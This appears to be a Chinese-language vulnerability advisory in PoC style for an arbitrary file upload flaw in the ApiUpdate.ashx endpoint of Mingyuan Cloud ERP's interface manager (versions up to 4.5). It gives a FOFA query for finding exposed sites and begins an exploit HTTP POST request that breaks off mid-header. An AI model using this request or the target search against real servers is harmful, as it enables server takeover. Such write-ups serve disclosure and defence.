明源云ERP系统接口管家 ApiUpdate.ashx 任意文件上传漏洞(QVD-2023-20382)

0x01 产品简介

明源云ERP系统接口管家是明源云ERP提供的一个功能，用于管理和处理系统与外部系统之间的接口集成。它充当了ERP系统与其他应用程序、第三方系统或服务之间的桥梁，负责数据的传输、交换和同步。通过接口管家，用户可以配置和管理不同接口的参数、调度和监控接口执行情况，以确保系统之间的数据交流和协同工作的顺畅运行。接口管家通常提供了一些常见的接口类型，如文件接口、Web服务接口、数据库接口等，以满足不同系统集成的需求。它可以处理数据的转换、验证和映射，确保数据的准确性和一致性。此外，接口管家还提供了日志记录和错误处理机制，以便及时发现和解决接口传输或处理中的问题。

0x02 漏洞概述

明源云 ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞，攻击者通过构造特殊的ZIP压缩包可以上传任意文件，进而控制整个服务器。

0x03 影响范围

明源云ERP <= 4.5

0x04 复现环境

FOFA：body="接口管家站点正常！"

0x05 漏洞复现

PoC

POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) V